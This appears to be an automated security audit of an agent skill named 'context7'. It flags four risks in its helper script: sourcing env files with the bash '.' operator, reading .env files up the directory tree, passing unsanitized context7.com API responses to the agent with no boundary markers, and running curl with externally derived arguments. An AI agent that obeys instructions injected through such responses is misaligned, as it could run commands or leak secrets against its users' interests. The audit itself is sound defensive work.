context7
Warn
Audited by Gen Agent Trust Hub on Mar 11, 2026
Risk Level: MEDIUMREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The
_context7_source_envfunction inscripts/context7.shuses the bash source operator (.) to load environment files. This executes any bash code contained in the file within the current shell context. Since the lookup logic searches multiple and potentially untrusted filesystem locations, this presents a risk of arbitrary code execution. - [DATA_EXFILTRATION]: The
_context7_load_envfunction inscripts/context7.shimplements a filesystem search that look for and reads.envfiles in the current working directory and recursively through all parent directories. - [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection by processing untrusted data from the
context7.comAPI. - Ingestion points: API responses from the
docsandjsonsubcommands inscripts/context7.share fed directly to the agent. - Boundary markers: None are used to separate the fetched documentation from the agent's instructions.
- Capability inventory: The agent can execute system commands (
curl,jq,awk) and has shell access via the skill's helpers. - Sanitization: No validation or sanitization of the external API content is performed.
- [COMMAND_EXECUTION]: The bash helper script executes
curlandjqwith arguments derived from external API responses and user-provided library IDs or queries.
Audit Metadata